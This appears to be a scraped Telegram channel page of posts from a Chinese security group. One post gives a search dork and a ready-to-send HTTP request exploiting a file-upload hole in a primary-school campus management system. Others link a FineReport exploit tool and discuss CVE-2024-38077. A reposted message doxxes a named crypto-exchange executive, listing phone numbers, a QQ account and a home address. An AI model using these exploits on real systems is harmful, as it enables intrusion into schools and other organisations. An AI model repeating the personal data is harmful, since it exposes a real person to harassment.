野火


Гео и язык канала: Китай, Китайский
Категория: Telegram


技术分享

Связанные каналы  |  Похожие каналы

Гео и язык канала
Китай, Китайский
Категория
Telegram
Статистика
Фильтр публикаций




哪位群友


今天拿老洞开个盲盒


Репост из: 网安大舞台


野火


2024HW第一阶段已经于2024/8/30 21:00结束,师傅们辛苦了


哪位群友


小学智慧校园信息管理系统 Upload 文件上传漏洞
fofa:body="/Login/IndexMobi"

POST /PSE/Upload HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Content-Type: multipart/form-data; boundary=230982304982309
Connection: close
Content-Length: 239

--230982304982309
Content-Disposition: form-data; name="file"; filename="Hello.aspx"
Content-Type: image/jpg


--230982304982309--

地址:/Upload/PrimarySchoolEnrollment/回显文件名


前面这几天停更说明:去谈恋爱了


Репост из: 达摩克利斯之剑批量生产中心
达摩克利斯之剑宣布向欧易老总徐明星落下
钱包冻结热线
16671568749
13915147682
18611869680
qq
459149117
地址
北京北京市海淀区清河小营东路莱圳家园12号楼4单元701
微博
https://weibo.com/u/1892299953
笔者寄语:
有多少人因为爆仓就此天台见?有多少人因为冻结就此回到解放前?有多少人因为钱包溯源就此摁头撅皮炎?一切的始作俑者却仍然逍遥法外 故本站现替天行道 以昭天命


沪国智障企业+1


ChatExport_2024-08-19.zip
106.3Кб
聊天记录全量导出,请大家自行判断


你对我的指责简直荒谬至极,且毫无事实依据。你显然对整个情况一无所知,更别提责任归属了。在8月12日至8月17日这段时间,我在外地出差,没有任何网络连接,更不可能参与任何与资金有关的操作。你在我出差期间的所有损失与我毫无关系,竟然无视事实,将自己的失误归咎于我,这种行为极其卑劣且不负责任。

首先,我在2024年8月12日至8月17日期间完全不在工作岗位,无法进行任何操作。这段时间你的损失发生在我离开之后,你居然把自己的被骗损失全盘推给我,这种做法简直无耻。你对我工作表现的恶意诋毁不仅毫无事实依据,还显示出你对基本逻辑和诚实的完全无知。

“定金”根本不存在,我并没有收到你所谓的"资金"。你的损失是你自己被诈骗犯骗走的结果,与我无关。现在你竟然试图用这种方式来逃避责任,这不仅是对我个人的恶意攻击,也极度不尊重基本的伦理道德。

你被骗的1650U与你的操作失误和诈骗者有关,与我毫无关系。我们的聊天记录清楚地表明,我从未收到你所谓的定金,你的资金问题完全是你自己处理不当的结果。你无视事实,将责任推卸给我,你显然在寻找替罪羊,试图将你的失误和诈骗者的行径推到我身上,这是极度不负责任的行为,是在掩盖你自己的无能。

我要求你立即停止这种恶意的指责,并且收回你的无端攻击。继续这样不仅无法解决问题,还会让你的形象变得更加狼狈。要解决问题,首先要面对事实,停止自欺欺人。希望你能从中吸取教训

我一直秉持诚实和专业的态度对待每一位客户。我的行为和工作记录都可以被查证。在我们的交流中,我的立场始终是提供帮助,而不是参与任何不正当行为。

希望圈中的其他大佬避雷,无力吐槽。。


哪位群友


#工具分享-扫描工具 帆软漏洞批量检测脚本
免责声明
本项目只用于学习交流目的。

由于传播、利用该工具(下简称本工具)提供的检测功能而造成的任何直接或者间接的后果及损失,均由使用者本人负责,开发者 不为此承担任何责任。

漏洞检测 PoC
其中包含以下漏洞检测

帆软 FineReport V8 任意文件读取漏洞
帆软 FineReport V8 任意文件读取漏洞
帆软 FineReport V9 前台 RCE
帆软高版本 channel 反序列化接口检测(RCE PoC 暂时不公开)
其他
本项目对于 PoC 收录不全,若有需要补充的 PoC 请提 issue 或者发送邮件至 drun1baby@qq.com

随缘更新

地址:https://github.com/Drun1baby/FineReportExploit








Репост из: 渊龙Sec安全团队
CVE-2024-38077漏洞利用容易、危害巨大,但需要开启Windows Remote Desktop Licensing(RDL)Service,而这个功能是需要手动安装去勾选的🧐
但一些业务服务器因为业务需要会开启此功能,漏洞细节还在探🫠
白袍师傅:这个Remote Desktop Services角色和3389登录没关系,不是说3389能登录就代表有这个



Показано 20 последних публикаций.